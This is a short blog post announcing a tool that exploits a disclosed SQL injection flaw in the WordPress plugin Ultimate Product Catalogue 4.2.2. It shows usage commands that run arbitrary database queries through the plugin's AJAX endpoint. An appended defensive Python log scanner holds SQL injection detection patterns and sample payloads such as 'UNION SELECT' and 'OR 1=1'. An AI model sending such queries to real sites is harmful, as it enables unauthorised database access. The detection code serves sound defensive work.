Some days ago, a SQL injection vulnerability in the WordPress plugin Ultimate Product Catalogue 4.2.2 was disclosed. You can see the details here.

Based on the paper, I wrote a simple tool to exploit the vulnerability. You can download the script here.


How to use

./ -u http://mywp/wp-admin/admin-ajax.php?action=get_upcp_subcategories -c "mycookie"

[Screenshot from 2017-07-05 11-42-23]

./ -u http://mywp/wp-admin/admin-ajax.php?action=get_upcp_subcategories -c "mycookie" -q "SELECT user(),database()"

[Screenshot from 2017-07-05 11-43-14]
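Added here as a defensive example that is not part of the original post or the author's script: a small Python checker that flags web-server access-log requests to the get_upcp_subcategories AJAX action whose parameter values carry SQL syntax. The log lines, client addresses and the "cat" parameter name are constructed for illustration and are not taken from the post or the paper.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The AJAX action named in the post. The "cat" parameter name and the payload
# in the sample lines below are constructed for illustration only.
SUSPECT_ACTION = "get_upcp_subcategories"

# Common-log-format request line: method, path?query, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators of SQL tampering inside a percent-decoded parameter value.
SQLI_RE = re.compile(
    r"\b(union|select|sleep|benchmark|information_schema)\b|'|--|/\*",
    re.IGNORECASE,
)

SAMPLE_LOG = """\
203.0.113.10 - - [05/Jul/2017:11:42:23 +0000] "GET /wp-admin/admin-ajax.php?action=get_upcp_subcategories&cat=3 HTTP/1.1" 200 512
203.0.113.10 - - [05/Jul/2017:11:43:14 +0000] "GET /wp-admin/admin-ajax.php?action=get_upcp_subcategories&cat=3%20UNION%20SELECT%20user()%2Cdatabase() HTTP/1.1" 200 731
198.51.100.7 - - [05/Jul/2017:11:44:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&cat=1%27%20OR%201=1 HTTP/1.1" 200 30
"""


def inspect_line(line):
    """Return (client_ip, parameter, decoded value) when a request to the
    vulnerable AJAX action carries a SQL-looking value, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    if params.get("action", [""])[0] != SUSPECT_ACTION:
        return None  # other actions are out of scope for this rule
    for name, values in params.items():
        for value in values:
            if name != "action" and SQLI_RE.search(value):
                return (line.split()[0], name, value)
    return None


def scan_log(text):
    """Run inspect_line over every line of an access log; keep only the hits."""
    return [hit for hit in map(inspect_line, text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print(f"ALERT {ip}: {SUSPECT_ACTION} called with {name}={value!r}")
```

Matching on the action name keeps the rule narrow; the third sample line shows a SQL-looking value under another action and is deliberately not reported.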